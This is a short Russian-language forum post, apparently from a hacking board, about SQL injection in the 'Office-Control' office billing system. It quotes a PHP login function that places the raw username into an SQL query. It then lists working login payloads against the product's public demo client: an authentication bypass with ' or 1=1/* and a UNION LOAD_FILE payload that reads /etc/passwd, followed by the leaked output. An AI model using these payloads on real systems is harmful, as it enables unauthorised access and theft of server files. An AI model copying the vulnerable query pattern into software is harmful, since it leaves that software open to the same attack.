Система "Office-Control" предназначена для управления, биллинга и защиты сетей офисов первое что сразу же попалось на глаза: http://office-control.org/svn/repos/client_web/www/classes/base/session.php PHP: public function Login($strUsername, $strPlainPassword, $admin=0) { $strMD5Password = md5($strPlainPassword); if ($admin==0) $stmt = "select id FROM clients WHERE login = '$strUsername' AND password = '$strMD5Password'"; else $stmt = "select id FROM admins WHERE login = '$strUsername' AND password = '$strMD5Password'"; client.office-control.org - Демо-версия WEB-клиента. имя - new, пароль - 123. Вход без пароля: Code: Login: ' or 1=1/* Password: never mind Login: 123'/* Password: never mind Есть права для работы с файлами: Code: Login: a' union select LOAD_FILE('/etc/passwd')/* Password: never mind Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[B]:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon[/B]' at line 1
